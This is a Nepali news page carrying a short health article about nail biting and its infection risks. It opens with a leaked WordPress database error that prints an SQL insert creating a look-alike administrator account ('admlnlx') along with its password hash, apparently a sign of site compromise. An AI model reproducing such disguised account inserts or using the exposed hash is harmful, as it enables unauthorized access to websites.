WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDITiG9/0alctAEvyVzzbJeg.2ZAhu1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 15:59:26', '', 'admlnlx', 'admlnlx')
चितवन,माघ २७-
कुनै मानिसको औंला मुखमा राखेर नङ चपाउने बानी हुने गर्छ । खाली समयमा प्रायः मानिस यस्तो गर्छन् । कुनै तनाव भएमा पनि मानिसले नङ चपाउने काम गर्छन् ।
यस्तो कार्य स्वास्थ्यको लागि निकै हानिकारक हुने चिकित्सकहरुले बताएका छन् । नङ भित्र आँखाले देख्न नसक्ने साना–साना फोहोरहरु मुखको माध्यमबाट सिधै पेटमा जाने र विभिन्न किसिमका रोगहरु लाग्न सक्छ ।
बाह्य संक्रमणले मानिसले छिटै विरामी हुन सक्छ । यस्तो कार्यले शारीरको भित्री भागमा मात्रै नभई बाह्य छालालाई पनि असर पुग्ने देखिएको छ ।
नङ चपाउने बानीले त्यो वरपरको छाला गलेर नरम बन्छ र बाह्य किटाणुले सजिलै संक्रमण गर्न सक्छन् । त्यस्तै दाँत र गिँजामा पनि संक्रमण हुने खतरा बढ्नछ । नङ चपाउने बानीले व्यक्तिको आत्माविश्वास पनि कम भएको बुझिन्छ ।